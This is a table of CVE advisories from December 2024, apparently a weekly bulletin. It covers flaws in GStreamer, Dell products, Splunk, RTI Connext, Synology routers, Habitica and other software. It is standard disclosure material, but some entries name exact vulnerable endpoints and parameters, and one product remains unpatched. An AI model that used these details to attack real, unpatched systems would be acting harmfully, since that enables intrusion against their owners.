GStreamer is a library for constructing graphs of media-handling components. An OOB-read vulnerability has been discovered in gst_wavparse_adtl_chunk within gstwavparse.c. This vulnerability arises due to insufficient validation of the size parameter, which can exceed the bounds of the data buffer. As a result, an OOB read occurs in the following while loop. This vulnerability can result in reading up to 4GB of process memory or potentially causing a segmentation fault (SEGV) when accessing invalid memory. This vulnerability is fixed in 1.24.10. | 2024-12-12 | not yet calculated | CVE-2024-47778 |
| n/a -- n/a |
GStreamer is a library for constructing graphs of media-handling components. An Use-After-Free read vulnerability has been discovered affecting the processing of CodecPrivate elements in Matroska streams. In the GST_MATROSKA_ID_CODECPRIVATE case within the gst_matroska_demux_parse_stream function, a data chunk is allocated using gst_ebml_read_binary. Later, the allocated memory is freed in the gst_matroska_track_free function, by the call to g_free (track->codec_priv). Finally, the freed memory is accessed in the caps_serialize function through gst_value_serialize_buffer. The freed memory will be accessed in the gst_value_serialize_buffer function. This results in a UAF read vulnerability, as the function tries to process memory that has already been freed. This vulnerability is fixed in 1.24.10. | 2024-12-12 | not yet calculated | CVE-2024-47834 |
| n/a -- n/a |
GStreamer is a library for constructing graphs of media-handling components. A null pointer dereference vulnerability has been detected in the parse_lrc function within gstsubparse.c. The parse_lrc function calls strchr() to find the character ']' in the string line. The pointer returned by this call is then passed to g_strdup(). However, if the string line does not contain the character ']', strchr() returns NULL, and a call to g_strdup(start + 1) leads to a null pointer dereference. This vulnerability is fixed in 1.24.10. | 2024-12-12 | not yet calculated | CVE-2024-47835 |
| n/a -- n/a |
Software installed and run as a non-privileged user may conduct GPU system calls to read and write freed physical memory from the GPU. | 2024-12-13 | not yet calculated | CVE-2024-47892 |
| n/a -- n/a |
If the attacker has access to a valid Poweruser session, remote code execution is possible because specially crafted valid PNG files with injected PHP content can be uploaded as desktop backgrounds or lock screens. After the upload, the PHP script is available in the web root. The PHP code executes once the uploaded file is accessed. This allows the execution of arbitrary PHP code and OS commands on the device as "www-data". | 2024-12-10 | not yet calculated | CVE-2024-47946 |
| n/a -- n/a |
Due to missing input sanitization, an attacker can perform cross-site-scripting attacks and run arbitrary Javascript in the browser of other users. The "Edit Disclaimer Text" function of the configuration menu is vulnerable to stored XSS. Only the users Poweruser and Admin can use this function which is available at the URL https://$SCANNER/cgi/admin.cgi?-rdisclaimer+-apre The stored Javascript payload will be executed every time the ScanWizard is loaded, even in the Kiosk-mode browser. | 2024-12-12 | not yet calculated | CVE-2024-47947 |
| n/a -- n/a |
Dell Avamar, version(s) 19.x, contain(s) an Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Command execution. | 2024-12-10 | not yet calculated | CVE-2024-47977 |
| n/a -- n/a |
Dell RecoverPoint for Virtual Machines 6.0.x contains Denial of Service vulnerability. A User with Remote access could potentially exploit this vulnerability, leading to the disruption of most functionalities of the RPA persistent after reboot, resulting in need of technical support intervention in getting system back to stable state. | 2024-12-13 | not yet calculated | CVE-2024-47984 |
| n/a -- n/a |
Dell RecoverPoint for Virtual Machines 6.0.x contains use of hard-coded credentials vulnerability. A Remote unauthenticated attacker could potentially exploit this vulnerability by gaining access to the source code, easily retrieving these secrets and reusing them to access the system leading to gaining access to unauthorized data. | 2024-12-13 | not yet calculated | CVE-2024-48007 |
| n/a -- n/a |
Dell RecoverPoint for Virtual Machines 6.0.x contains a OS Command Injection vulnerability. An Low privileged remote attacker could potentially exploit this vulnerability leading to information disclosure ,allowing of unintended actions like reading files that may contain sensitive information | 2024-12-13 | not yet calculated | CVE-2024-48008 |
| n/a -- n/a |
GLPI is a free asset and IT management software package. Starting in version 10.0.0 and prior to version 10.0.17, an authenticated user can use an application endpoint to delete any user account. Version 10.0.17 contains a patch for this issue. | 2024-12-11 | not yet calculated | CVE-2024-48912 |
| n/a -- n/a |
Serviceware Processes 6.0 through 7.3 allows attackers without valid authentication to send a specially crafted HTTP request to a service endpoint resulting in remote code execution. | 2024-12-09 | not yet calculated | CVE-2024-48956 |
| n/a -- n/a |
Acrobat Reader versions 24.005.20307, 24.001.30213, 24.001.30193, 20.005.30730, 20.005.30710 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | not yet calculated | CVE-2024-49532 |
| n/a -- n/a |
Acrobat Reader versions 24.005.20307, 24.001.30213, 24.001.30193, 20.005.30730, 20.005.30710 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | not yet calculated | CVE-2024-49533 |
| n/a -- n/a |
Acrobat Reader versions 24.005.20307, 24.001.30213, 24.001.30193, 20.005.30730, 20.005.30710 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | not yet calculated | CVE-2024-49534 |
| n/a -- n/a |
Dell Power Manager (DPM), versions prior to 3.17, contain an improper access control vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Code execution and Elevation of Privileges. | 2024-12-09 | not yet calculated | CVE-2024-49600 |
| n/a -- n/a |
Dell PowerScale OneFS Versions 8.2.2.x through 9.8.0.x contain an improper resource unlocking vulnerability. A remote low privileged attacker could potentially exploit this vulnerability, leading to denial of service. | 2024-12-09 | not yet calculated | CVE-2024-49602 |
| n/a -- n/a |
Dell PowerScale OneFS Versions 8.2.2.x through 9.9.0.x contain an incorrect specified argument vulnerability. A remote low privileged legitimate user could potentially exploit this vulnerability, leading to information disclosure. | 2024-12-09 | not yet calculated | CVE-2024-49603 |
| n/a -- n/a |
GLPI is a free asset and IT management software package. Starting in version 9.5.0 and prior to version 10.0.17, an unauthenticated user can retrieve all the sessions IDs and use them to steal any valid session. Version 10.0.17 contains a patch for this issue. | 2024-12-12 | not yet calculated | CVE-2024-50339 |
| n/a -- n/a |
An authenticated attacker with the user/role "Poweruser" can perform an SQL injection by accessing the /class/template_io.php file and supplying malicious GET parameters. The "templates" parameter is vulnerable against blind boolean-based SQL injection attacks. SQL syntax must be injected into the JSON syntax of the templates parameter. | 2024-12-12 | not yet calculated | CVE-2024-50584 |
| n/a -- n/a |
Users who click on a malicious link or visit a website under the control of an attacker can be infected with arbitrary JavaScript which is running in the context of the "Numerix License Server Administration System Login" (nlslogin.jsp) page. The vulnerability can be triggered by sending a specially crafted HTTP POST request. The vendor was unresponsive during multiple attempts to contact them via various channels, hence there is no solution available. In case you are using this software, be sure to restrict access and monitor logs. Try to reach out to your contact person for this vendor and request a patch. | 2024-12-11 | not yet calculated | CVE-2024-50585 |
| n/a -- n/a |
An issue was discovered in Digi ConnectPort LTS before 1.4.12. A vulnerability in the file upload handling of a web application allows manipulation of file paths via POST requests. This can lead to arbitrary file uploads within specific directories, potentially enabling privilege escalation when combined with other vulnerabilities. | 2024-12-09 | not yet calculated | CVE-2024-50625 |
| n/a -- n/a |
An issue was discovered in Digi ConnectPort LTS before 1.4.12. A Directory Traversal vulnerability exists in WebFS. This allows an attacker on the local area network to manipulate URLs to include traversal sequences, potentially leading to unauthorized access to data. | 2024-12-09 | not yet calculated | CVE-2024-50626 |
| n/a -- n/a |
An issue was discovered in Digi ConnectPort LTS before 1.4.12. A Privilege Escalation vulnerability exists in the file upload feature. It allows an attacker on the local area network (with specific permissions) to upload and execute malicious files, potentially leading to unauthorized system access. | 2024-12-09 | not yet calculated | CVE-2024-50627 |
| n/a -- n/a |
An issue was discovered in the web services of Digi ConnectPort LTS before 1.4.12. It allows an attacker on the local area network to achieve unauthorized manipulation of resources, which may lead to remote code execution when combined with other issues. | 2024-12-09 | not yet calculated | CVE-2024-50628 |
| n/a -- n/a |
TP-Link TL-WR845N(UN)_V4_201214, TL-WR845N(UN)_V4_200909 and TL-WR845N(UN)_V4_190219 were discovered to contain weak default credentials for the Administrator account. | 2024-12-10 | not yet calculated | CVE-2024-50699 |
| n/a -- n/a |
Insecure permissions in Silicon Labs (SiLabs) Z-Wave Series 700 and 800 v7.21.1 allow attackers to create a fake node via supplying crafted packets. | 2024-12-10 | not yet calculated | CVE-2024-50920 |
| n/a -- n/a |
Insecure permissions in Silicon Labs (SiLabs) Z-Wave Series 700 and 800 v7.21.1 allow attackers to cause a Denial of Service (DoS) via repeatedly sending crafted packets to the controller. | 2024-12-10 | not yet calculated | CVE-2024-50921 |
| n/a -- n/a |
Insecure permissions in Silicon Labs (SiLabs) Z-Wave Series 700 and 800 v7.21.1 allow attackers to cause disrupt communications between the controller and the device itself via repeatedly sending crafted packets to the controller. | 2024-12-10 | not yet calculated | CVE-2024-50924 |
| n/a -- n/a |
Insecure permissions in Silicon Labs (SiLabs) Z-Wave Series 700 and 800 v7.21.1 allow attackers to change the wakeup interval of end devices in controller memory, disrupting the device's communications with the controller. | 2024-12-10 | not yet calculated | CVE-2024-50928 |
| n/a -- n/a |
Insecure permissions in Silicon Labs (SiLabs) Z-Wave Series 700 and 800 v7.21.1 allow attackers to arbitrarily change the device type in the controller's memory, leading to a Denial of Service (DoS). | 2024-12-10 | not yet calculated | CVE-2024-50929 |
| n/a -- n/a |
An issue in Silicon Labs Z-Wave Series 500 v6.84.0 allows attackers to execute arbitrary code. | 2024-12-10 | not yet calculated | CVE-2024-50930 |
| n/a -- n/a |
Silicon Labs Z-Wave Series 500 v6.84.0 was discovered to contain insecure permissions. | 2024-12-10 | not yet calculated | CVE-2024-50931 |
| n/a -- n/a |
SQL injection vulnerability in JEPAAS7.2.8, via /je/rbac/rbac/loadLoginCount in the dateVal parameter, which could allow a remote user to submit a specially crafted query, allowing an attacker to retrieve all the information stored in the DB. | 2024-12-10 | not yet calculated | CVE-2024-51165 |
| n/a -- n/a |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in RTI Connext Professional (Queuing Service) allows SQL Injection.This issue affects Connext Professional: from 7.0.0 before 7.3.0, from 6.1.0 before 6.1.2.17, from 6.0.0 before 6.0.*, from 5.2.0 before 5.3.*. | 2024-12-13 | not yet calculated | CVE-2024-52057 |
| n/a -- n/a |
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in RTI Connext Professional (System Designer) allows OS Command Injection.This issue affects Connext Professional: from 7.0.0 before 7.3.0.2, from 6.1.0 before 6.1.2.19. | 2024-12-13 | not yet calculated | CVE-2024-52058 |
| n/a -- n/a |
Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') vulnerability in RTI Connext Professional (Security Plugins) allows Overflow Variables and Tags.This issue affects Connext Professional: from 7.0.0 before 7.3.0.2, from 6.1.0 before 6.1.2.17. | 2024-12-13 | not yet calculated | CVE-2024-52059 |
| n/a -- n/a |
Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') vulnerability in RTI Connext Professional (Routing Service, Recording Service, Queuing Service, Observability Collector Service, Cloud Discovery Service) allows Buffer Overflow via Environment Variables.This issue affects Connext Professional: from 7.0.0 before 7.3.0.5, from 6.1.0 before 6.1.2.21, from 6.0.0 before 6.0.*, from 5.3.0 before 5.3.1.45. | 2024-12-13 | not yet calculated | CVE-2024-52060 |
| n/a -- n/a |
Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') vulnerability in RTI Connext Professional (Core Libraries, Queuing Service, Recording Service, Routing Service) allows Overflow Variables and Tags.This issue affects Connext Professional: from 7.4.0 before 7.5.0, from 7.0.0 before 7.3.0.5, from 6.1.0 before 6.1.2.21, from 6.0.0 before 6.0.1.40, from 5.0.0 before 5.3.1.45. | 2024-12-13 | not yet calculated | CVE-2024-52061 |
| n/a -- n/a |
Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') vulnerability in RTI Connext Professional (Core Libraries) allows Overflow Variables and Tags.This issue affects Connext Professional: from 7.0.0 before 7.3.0.5, from 6.1.0 before 6.1.2.21, from 6.0.0 before 6.0.1.40, from 5.0.0 before 5.3.1.45. | 2024-12-13 | not yet calculated | CVE-2024-52062 |
| n/a -- n/a |
Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') vulnerability in RTI Connext Professional (Core Libraries, Routing Service) allows Overflow Variables and Tags.This issue affects Connext Professional: from 7.0.0 before 7.3.0.5, from 6.1.0 before 6.1.2.21, from 6.0.0 before 6.0.1.40, from 5.0.0 before 5.3.1.45. | 2024-12-13 | not yet calculated | CVE-2024-52063 |
| n/a -- n/a |
Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') vulnerability in RTI Connext Professional (Core Libraries) allows Overflow Variables and Tags.This issue affects Connext Professional: from 7.0.0 before 7.3.0.2, from 6.1.0 before 6.1.2.21, from 6.0.0 before 6.0.1.40, from 5.0.0 before 5.3.1.45. | 2024-12-13 | not yet calculated | CVE-2024-52064 |
| n/a -- n/a |
Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') vulnerability in RTI Connext Professional on non-Windows (Persistence Service) allows Buffer Overflow via Environment Variables.This issue affects Connext Professional: from 7.0.0 before 7.3.0.2, from 6.1.1.2 before 6.1.2.21, from 5.3.1.40 before 5.3.1.41. | 2024-12-13 | not yet calculated | CVE-2024-52065 |
| n/a -- n/a |
Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') vulnerability in RTI Connext Professional (Routing Service) allows Overflow Variables and Tags.This issue affects Connext Professional: from 7.4.0 before 7.5.0, from 7.0.0 before 7.3.0.5, from 6.1.0 before 6.1.2.21, from 6.0.0 before 6.0.1.40. | 2024-12-13 | not yet calculated | CVE-2024-52066 |
| n/a -- n/a |
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Sk. Abul Hasan Team Member.This issue affects Team Member: from n/a through 7.3. | 2024-12-09 | not yet calculated | CVE-2024-52385 |
| n/a -- n/a |
Missing Authorization vulnerability in Genetech Pie Register Premium.This issue affects Pie Register Premium: from n/a before 3.8.3.3. | 2024-12-09 | not yet calculated | CVE-2024-52391 |
| n/a -- n/a |
Missing Authorization vulnerability in Astoundify Jobify - Job Board WordPress Theme.This issue affects Jobify - Job Board WordPress Theme: from n/a through 4.2.3. | 2024-12-09 | not yet calculated | CVE-2024-52480 |
| n/a -- n/a |
Dell Client Platform Firmware Update Utility contains an Improper Link Resolution vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to Elevation of Privileges. | 2024-12-11 | not yet calculated | CVE-2024-52537 |
| n/a -- n/a |
Dell Avamar, version(s) 19.x, contain(s) an Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Script injection. | 2024-12-10 | not yet calculated | CVE-2024-52538 |
| n/a -- n/a |
eLabFTW is an open source electronic lab notebook for research labs. A vulnerability has been found starting in version 4.6.0 and prior to version 5.1.0 that allows an attacker to bypass eLabFTW's built-in multifactor authentication mechanism. An attacker who can authenticate locally (by knowing or guessing the password of a user) can thus log in regardless of MFA requirements. This does not affect MFA that are performed by single sign-on services. Users are advised to upgrade to at least version 5.1.9 to receive a fix. | 2024-12-09 | not yet calculated | CVE-2024-52586 |
| n/a -- n/a |
Tuleap is an open source suite to improve management of software developments and collaboration. In Tuleap Community Edition prior to version 16.1.99.50 and Tuleap Enterprise Edition prior to versions 16.1-4 and 16.0-7, a malicious user with the ability to create an artifact in a tracker with a Gantt chart could force a victim to execute uncontrolled code. Tuleap Community Edition 16.1.99.50, Tuleap Enterprise Edition 16.1-4, and Tuleap Enterprise Edition 16.0-7 contain a fix. | 2024-12-09 | not yet calculated | CVE-2024-52599 |
| n/a -- n/a |
In Splunk Enterprise versions below 9.3.2, 9.2.4, and 9.1.7 and versions below 3.2.462, 3.7.18, and 3.8.5 of the Splunk Secure Gateway app on Splunk Cloud Platform, a low-privileged user that does not hold the "admin" or "power" Splunk roles could see alert search query responses using Splunk Secure Gateway App Key Value Store (KVstore) collections endpoints due to improper access control. | 2024-12-10 | not yet calculated | CVE-2024-53243 |
| n/a -- n/a |
In Splunk Enterprise versions below 9.3.2, 9.2.4, and 9.1.7 and Splunk Cloud Platform versions below 9.2.2406.107, 9.2.2403.109, and 9.1.2312.206, a low-privileged user that does not hold the "admin" or "power" Splunk roles could run a saved search with a risky command using the permissions of a higher-privileged user to bypass the SPL safeguards for risky commands on "/en-US/app/search/report" endpoint through "s" parameter.<br>The vulnerability requires the attacker to phish the victim by tricking them into initiating a request within their browser. The authenticated user should not be able to exploit the vulnerability at will. | 2024-12-10 | not yet calculated | CVE-2024-53244 |
| n/a -- n/a |
In Splunk Enterprise versions below 9.3.0, 9.2.4, and 9.1.7 and Splunk Cloud Platform versions below 9.1.2312.206, a low-privileged user that does not hold the "admin" or "power" Splunk roles, that has a username with the same name as a role with read access to dashboards, could see the dashboard name and the dashboard XML by cloning the dashboard. | 2024-12-10 | not yet calculated | CVE-2024-53245 |
| n/a -- n/a |
In Splunk Enterprise versions below 9.3.2, 9.2.4, and 9.1.7 and Splunk Cloud Platform versions below 9.3.2408.101, 9.2.2406.106, 9.2.2403.111, and 9.1.2312.206, an SPL command can potentially disclose sensitive information. The vulnerability requires the exploitation of another vulnerability, such as a Risky Commands Bypass, for successful exploitation. | 2024-12-10 | not yet calculated | CVE-2024-53246 |
| n/a -- n/a |
In Splunk Enterprise versions below 9.3.2, 9.2.4, and 9.1.7, and versions below 3.2.461 and 3.7.13 of the Splunk Secure Gateway app on Splunk Cloud Platform, a low-privileged user that does not hold the "admin" or "power" Splunk roles could perform a Remote Code Execution (RCE). | 2024-12-10 | not yet calculated | CVE-2024-53247 |
| n/a -- n/a |
Habitica is an open-source habit-building program. Versions prior to 5.28.5 are vulnerable to reflected cross-site scripting. The `login` and `social media` function in `RegisterLoginReset.vue` contains two reflected XSS vulnerabilities due to an incorrect sanitization function. An attacker can specify a malicious `redirectTo` parameter to trigger the vulnerability, giving the attacker control of the victim's account when a victim registers or logins with a specially crafted link. Version 5.28.5 contains a patch. | 2024-12-12 | not yet calculated | CVE-2024-53272 |
| n/a -- n/a |
Habitica is an open-source habit-building program. Versions prior to 5.28.5 are vulnerable to reflected cross-site scripting. The `register` function in `RegisterLoginReset.vue` contains a reflected XSS vulnerability due to an incorrect sanitization function. An attacker can specify a malicious `redirectTo` parameter to trigger the vulnerability, giving the attacker control of the victim's account when a victim registers or logins with a specially crafted link. Version 5.28.5 contains a patch. | 2024-12-12 | not yet calculated | CVE-2024-53273 |
| n/a -- n/a |
Habitica is an open-source habit-building program. Versions prior to 5.28.5 are vulnerable to reflected cross-site scripting. The `register` function in `home.vue` containsa reflected XSS vulnerability due to an incorrect sanitization function. An attacker can specify a malicious `redirectTo` parameter to trigger the vulnerability. Arbitrary javascript can be executed by the attacker in the context of the victim's session. Version 5.28.5 contains a patch. | 2024-12-12 | not yet calculated | CVE-2024-53274 |
| n/a -- n/a |
Improper neutralization of input during web page generation ('Cross-site Scripting') vulnerability in file station functionality in Synology Router Manager (SRM) before 1.3.1-9346-10 allows remote authenticated users with administrator privileges to inject arbitrary web script or HTML via unspecified vectors. | 2024-12-09 | not yet calculated | CVE-2024-53279 |
| n/a -- n/a |
Improper neutralization of input during web page generation ('Cross-site Scripting') vulnerability in network center policy route functionality in Synology Router Manager (SRM) before 1.3.1-9346-10 allows remote authenticated users with administrator privileges to inject arbitrary web script or HTML via unspecified vectors. | 2024-12-09 | not yet calculated | CVE-2024-53280 |
| n/a -- n/a |
Improper neutralization of input during web page generation ('Cross-site Scripting') vulnerability in Network WOL functionality in Synology Router Manager (SRM) before 1.3.1-9346-10 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors. | 2024-12-09 | not yet calculated | CVE-2024-53281 |
| n/a -- n/a |
Improper neutralization of input during web page generation ('Cross-site Scripting') vulnerability in WiFi Connect MAC Filter functionality in Synology Router Manager (SRM) before 1.3.1-9346-10 allows remote authenticated users with administrator privileges to inject arbitrary web script or HTML via unspecified vectors. | 2024-12-09 | not yet calculated | CVE-2024-53282 |
| n/a -- n/a |
Improper neutralization of input during web page generation ('Cross-site Scripting') vulnerability in Router Port Forward functionality in Synology Router Manager (SRM) before 1.3.1-9346-10 allows remote authenticated users with administrator privileges to inject arbitrary web script or HTML via unspecified vectors. | 2024-12-09 | not yet calculated | CVE-2024-53283 |
| n/a -- n/a |
Improper neutralization of input during web page generation ('Cross-site Scripting') vulnerability in WiFi Connect Setting functionality in Synology Router Manager (SRM) before 1.3.1-9346-10 allows remote authenticated users with administrator privileges to inject arbitrary web script or HTML via unspecified vectors. | 2024-12-09 | not yet calculated | CVE-2024-53284 |
| n/a -- n/a |
Improper neutralization of input during web page generation ('Cross-site Scripting') vulnerability in DDNS Record functionality in Synology Router Manager (SRM) before 1.3.1-9346-10 allows remote authenticated users with administrator privileges to inject arbitrary web script or HTML via unspecified vectors. | 2024-12-09 | not yet calculated | CVE-2024-53285 |
| n/a -- n/a |
Dell ThinOS version 2408 contains a Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Elevation of Privileges. | 2024-12-11 | not yet calculated | CVE-2024-53289 |
| n/a -- n/a |
Dell ThinOS version 2408 contains an Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability. An unauthenticated attacker with local access could potentially exploit this vulnerability, leading to Command execution | 2024-12-11 | not yet calculated | CVE-2024-53290 |
| n/a -- n/a |
Dell VxVerify, versions prior to x.40.405, contain a Plain-text Password Storage Vulnerability in the shell wrapper. A local high privileged attacker could potentially exploit this vulnerability, leading to the disclosure of certain user credentials. The attacker may be able to use the exposed credentials to access the vulnerable component with privileges of the compromised account. | 2024-12-11 | not yet calculated | CVE-2024-53292 |
| n/a -- n/a |
An issue in the index.js decryptCookie function of cookie-encrypter v1.0.1 allows attackers to execute a bit flipping attack. | 2024-12-09 | not yet calculated | CVE-2024-53441 |
| n/a -- n/a |
RAGFlow 0.13.0 suffers from improper access control in document-hooks.ts, allowing unauthorized access to user documents. | 2024-12-09 | not yet calculated | CVE-2024-53450 |
| n/a -- n/a |
Phpgurukul's Beauty Parlour Management System v1.1 is vulnerable to SQL Injection in `login.php` via the `emailcont` parameter. | 2024-12-10 | not yet calculated | CVE-2024-53480 |
| n/a -- n/a |
A Cross Site Scripting (XSS) vulnerability in the profile.php of PHPGurukul Beauty Parlour Management System v1.1 allows remote attackers to execute arbitrary code by injecting arbitrary HTML into the "Firstname" and "Last name" parameters. | 2024-12-10 | not yet calculated | CVE-2024-53481 |
| n/a -- n/a |
CrushFTP 10 before 10.8.3 and 11 before 11.2.3 mishandles password reset, leading to account takeover. | 2024-12-10 | not yet calculated | CVE-2024-53552 |
| n/a -- n/a |
File upload logic is flawed vulnerability in Apache Struts. This issue affects Apache Struts: from 2.0.0 before 6.4.0. Users are recommended to upgrade to version 6.4.0 migrate to the new file upload mechanism https://struts.apache.org/core-developers/file-upload . You can find more details in https://cwiki.apache.org/confluence/display/WW/S2-067 | 2024-12-11 | not yet calculated | CVE-2024-53677 |
| n/a -- n/a |
Missing Authorization vulnerability in Alexander Volkov Chatter.This issue affects Chatter: from n/a through 1.0.1. | 2024-12-09 | not yet calculated | CVE-2024-53785 |
| n/a -- n/a |
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Ogun Labs Lenxel Core for Lenxel(LNX) LMS.This issue affects Lenxel Core for Lenxel(LNX) LMS: from n/a through 1.2.5. | 2024-12-09 | not yet calculated | CVE-2024-53790 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ogun Labs Lenxel Core for Lenxel(LNX) LMS allows Stored XSS.This issue affects Lenxel Core for Lenxel(LNX) LMS: from n/a through 1.2.5. | 2024-12-09 | not yet calculated | CVE-2024-53791 |
| n/a -- n/a |
Missing Authorization vulnerability in BAKKBONE Australia FloristPress.This issue affects FloristPress: from n/a through 7.3.0. | 2024-12-09 | not yet calculated | CVE-2024-53798 |
| n/a -- n/a |
Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Analytify.This issue affects Analytify: from n/a through 5.4.3. | 2024-12-09 | not yet calculated | CVE-2024-53814 |
| n/a -- n/a |
Missing Authorization vulnerability in Themeum Tutor LMS Elementor Addons.This issue affects Tutor LMS Elementor Addons: from n/a through 2.1.5. | 2024-12-09 | not yet calculated | CVE-2024-53816 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Post Grid Team by WPXPO PostX allows Stored XSS.This issue affects PostX: from n/a through 4.1.15. | 2024-12-09 | not yet calculated | CVE-2024-53818 |
| n/a -- n/a |
Missing Authorization vulnerability in Sprout Invoices Client Invoicing by Sprout Invoices.This issue affects Client Invoicing by Sprout Invoices: from n/a through 20.8.0. | 2024-12-09 | not yet calculated | CVE-2024-53819 |
| n/a -- n/a |
Unrestricted Upload of File with Dangerous Type vulnerability in Genetech Pie Register Premium.This issue affects Pie Register Premium: from n/a before 3.8.3.3. | 2024-12-09 | not yet calculated | CVE-2024-53822 |
| n/a -- n/a |
ESPTouch is a connection protocol for internet of things devices. In the ESPTouchV2 protocol, while there is an option to use a custom AES key, there is no option to set the IV (Initialization Vector) prior to versions 5.3.2, 5.2.4, 5.1.6, and 5.0.8. The IV is set to zero and remains constant throughout the product's lifetime. In AES/CBC mode, if the IV is not properly initialized, the encrypted output becomes deterministic, leading to potential data leakage. To address the aforementioned issues, the application generates a random IV when activating the AES key starting in versions 5.3.2, 5.2.4, 5.1.6, and 5.0.8. This IV is then transmitted along with the provision data to the provision device. The provision device has also been equipped with a parser for the AES IV. The upgrade is applicable for all applications and users of ESPTouch v2 component from ESP-IDF. As it is implemented in the ESP Wi-Fi stack, there is no workaround for the user to fix the application layer without upgrading the underlying firmware. | 2024-12-12 | not yet calculated | CVE-2024-53845 |
| n/a -- n/a |
The Trix rich text editor, prior to versions 2.1.9 and 1.3.3, is vulnerable to cross-site scripting (XSS) + mutation XSS attacks when pasting malicious code. An attacker could trick a user to copy and paste malicious code that would execute arbitrary JavaScript code within the context of the user's session, potentially leading to unauthorized actions being performed or sensitive information being disclosed. Users should upgrade to Trix editor version 2.1.9 or 1.3.3, which uses DOMPurify to sanitize the pasted content. | 2024-12-09 | not yet calculated | CVE-2024-53847 |
| n/a -- n/a |
The package manager pnpm prior to version 9.15.0 seems to mishandle overrides and global cache: Overrides from one workspace leak into npm metadata saved in global cache; npm metadata from global cache affects other workspaces; and installs by default don't revalidate the data (including on first lockfile generation). This can make workspace A (even running with `ignore-scripts=true`) posion global cache and execute scripts in workspace B. Users generally expect `ignore-scripts` to be sufficient to prevent immediate code execution on install (e.g. when the tree is just repacked/bundled without executing it). Here, that expectation is broken. Global state integrity is lost via operations that one would expect to be secure, enabling subsequently running arbitrary code execution on installs. Version 9.15.0 fixes the issue. As a work-around, use separate cache and store dirs in each workspace. | 2024-12-10 | not yet calculated | CVE-2024-53866 |
| n/a -- n/a |
An injection vulnerability in Barco ClickShare CX-30/20, C-5/10, and ClickShare Bar Pro and Core models, running firmware before 2.21.1, allows physically proximate attackers or local admins to the webUI to trigger OS-level command execution as root. | 2024-12-10 | not yet calculated | CVE-2024-53919 |
| n/a -- n/a |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Apache Superset. Specifically, certain engine-specific functions are not checked, which allows attackers to bypass Apache Superset's SQL authorization. This issue is a follow-up to CVE-2024-39887 with additional disallowed PostgreSQL functions now included: query_to_xml_and_xmlschema, table_to_xml, table_to_xml_and_xmlschema. This issue affects Apache Superset: <4.1.0. Users are recommended to upgrade to version 4.1.0, which fixes the issue or add these Postgres functions to the config set DISALLOWED_SQL_FUNCTIONS. | 2024-12-09 | not yet calculated | CVE-2024-53947 |
| n/a -- n/a |
Generation of Error Message Containing analytics metadata Information in Apache Superset. This issue affects Apache Superset: before 4.1.0. Users are recommended to upgrade to version 4.1.0, which fixes the issue. | 2024-12-09 | not yet calculated | CVE-2024-53948 |
| n/a -- n/a |
Improper Authorization vulnerability in Apache Superset when FAB_ADD_SECURITY_API is enabled (disabled by default). Allows for lower privilege users to use this API. issue affects Apache Superset: from 2.0.0 before 4.1.0. Users are recommended to upgrade to version 4.1.0, which fixes the issue. | 2024-12-09 | not yet calculated | CVE-2024-53949 |
| n/a -- n/a |
An authenticated Remote Code Execution (RCE) vulnerability exists in the AirWave CLI. Successful exploitation of this vulnerability could allow a remote authenticated threat actor to run arbitrary commands as a privileged user on the underlying host. | 2024-12-10 | not yet calculated | CVE-2024-54008 |
| n/a -- n/a |
A vulnerability has been identified in Parasolid V36.1 (All versions < V36.1.225), Parasolid V37.0 (All versions < V37.0.173). The affected application contains an out of bounds write past the end of an allocated buffer while parsing X_T data or a specially crafted file in X_T format. This could allow an attacker to execute code in the context of the current process. | 2024-12-10 | not yet calculated | CVE-2024-54091 |
| n/a -- n/a |
Vulnerability of improper access control in the MTP module Impact: Successful exploitation of this vulnerability may affect integrity and accuracy. | 2024-12-12 | not yet calculated | CVE-2024-54096 |
| n/a -- n/a |
Security vulnerability in the HiView module Impact: Successful exploitation of this vulnerability may affect feature implementation and integrity. | 2024-12-12 | not yet calculated | CVE-2024-54097 |
| n/a -- n/a |
Service logic error vulnerability in the system service module Impact: Successful exploitation of this vulnerability may affect service integrity. | 2024-12-12 | not yet calculated | CVE-2024-54098 |
| n/a -- n/a |
File replacement vulnerability on some devices Impact: Successful exploitation of this vulnerability will affect integrity and confidentiality. | 2024-12-12 | not yet calculated | CVE-2024-54099 |
| n/a -- n/a |
